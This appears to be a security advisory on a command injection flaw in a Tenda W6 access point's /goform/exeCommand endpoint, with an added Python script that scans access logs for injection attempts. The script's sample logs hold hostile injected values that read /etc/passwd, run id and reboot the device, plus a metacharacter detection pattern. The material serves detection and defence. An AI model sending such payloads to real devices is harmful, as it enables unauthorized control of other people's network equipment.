CVE-2022-35555 is a critical command injection vulnerability in the Tenda W6 V1.0.0.9(4122) wireless access point. It is reachable through the /goform/exeCommand endpoint: the value of the cmdinput parameter is passed to the underlying operating system without sanitization, so an attacker who controls that parameter can execute arbitrary commands on the device. Successful exploitation gives a remote attacker control of the access point, which can lead to unauthorized access, data exfiltration, or further compromise of the network behind it.
The vulnerability is tracked by multiple sources, including the National Vulnerability Database (NVD), MITRE, Tenable, GitHub, OpenCVE, VulDB, Cloud Defense, and FortiGuard Labs. Despite its severity, the SUSE security tracker lists CVE-2022-35555 with the status "REJECT". That status should be read in the context of that tracker (the flaw is in Tenda firmware, not in any SUSE product) rather than as a finding that the issue is not real; the other sources confirm its existence and impact.
Attackers exploit this vulnerability by sending specially crafted HTTP requests to /goform/exeCommand with shell metacharacters in the cmdinput parameter. No authentication is required, so any device whose management interface is reachable by the attacker is a target. The injected commands run with the privileges of the device's web server; on consumer network equipment that server commonly runs as root, so complete compromise of the device is the realistic outcome.
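The following detection script is an added example and is not part of the original advisory or of any Tenda code. It scans HTTP access log lines for requests to /goform/exeCommand whose cmdinput parameter (in the query string or the form body) contains shell metacharacters, which is the signature of an injection attempt against this endpoint. The log format and the sample lines are constructed for the example; adapt the LOG_LINE pattern to whatever your reverse proxy or IDS actually records.

```python
import re
from urllib.parse import parse_qs

# Constructed log format used by this example (not a real device or proxy format):
# <src_ip> "<METHOD> <path>[?query] HTTP/1.x" <status> body="<urlencoded body>"
LOG_LINE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) body="(?P<body>[^"]*)"$'
)

# Shell metacharacters that let a value appended to a command line start
# additional commands: ';', '&', '|', backtick, newline and '$('.
SHELL_META = re.compile(r'[;&|`\n]|\$\(')

VULNERABLE_PATH = "/goform/exeCommand"
VULNERABLE_PARAM = "cmdinput"

# Constructed sample traffic: benign diagnostics plus injection attempts.
SAMPLE_LOG = [
    '10.0.0.5 "GET /index.htm HTTP/1.1" 200 body=""',
    '10.0.0.7 "POST /goform/exeCommand HTTP/1.1" 200 body="cmdinput=ping%20127.0.0.1"',
    '203.0.113.9 "POST /goform/exeCommand HTTP/1.1" 200 '
    'body="cmdinput=ping%20127.0.0.1%3Bcat%20%2Fetc%2Fpasswd"',
    '203.0.113.9 "GET /goform/exeCommand?cmdinput=%60id%60 HTTP/1.1" 200 body=""',
    '198.51.100.4 "POST /goform/exeCommand HTTP/1.1" 200 body="cmdinput=%24%28reboot%29&other=1"',
    '10.0.0.5 "POST /goform/SetSysTimeCfg HTTP/1.1" 200 body="time=1%3B2"',
]


def cmdinput_values(line):
    """Return every URL-decoded cmdinput value sent to /goform/exeCommand in one line.

    Both the query string and the body are inspected, since the parameter can
    travel either way. Lines for other paths or that do not parse yield [].
    """
    m = LOG_LINE.match(line)
    if not m:
        return []
    path, _, query = m.group("target").partition("?")
    if path != VULNERABLE_PATH:
        return []
    values = []
    for raw in (query, m.group("body")):
        # parse_qs splits on '&' and percent-decodes, so a literal '&' inside
        # a value can only arrive encoded (%26) and survives into the check.
        values.extend(parse_qs(raw, keep_blank_values=True).get(VULNERABLE_PARAM, []))
    return values


def is_injection_attempt(line):
    """True when any cmdinput value carries a shell metacharacter."""
    return any(SHELL_META.search(v) for v in cmdinput_values(line))


def scan(lines):
    """Return (source_ip, decoded_cmdinput) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for value in cmdinput_values(line):
            if SHELL_META.search(value):
                hits.append((m.group("src"), value))
    return hits


if __name__ == "__main__":
    for src, value in scan(SAMPLE_LOG):
        print(f"injection attempt from {src}: cmdinput={value!r}")
```

Plain values such as a host to ping are not flagged, so the rule keys on the metacharacters rather than on every use of the endpoint; an even tighter rule would alert on any external-source request to /goform/exeCommand at all, since there is no legitimate reason for that endpoint to be reachable from outside the management network.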
The vulnerability rates as critical because it is trivial to exploit (a single unauthenticated HTTP request) and because the impact is full control of the device. Network administrators and security professionals should apply any vendor firmware update that addresses it and, whether or not one is available, make sure the device's web management interface is not reachable from the internet or from untrusted network segments.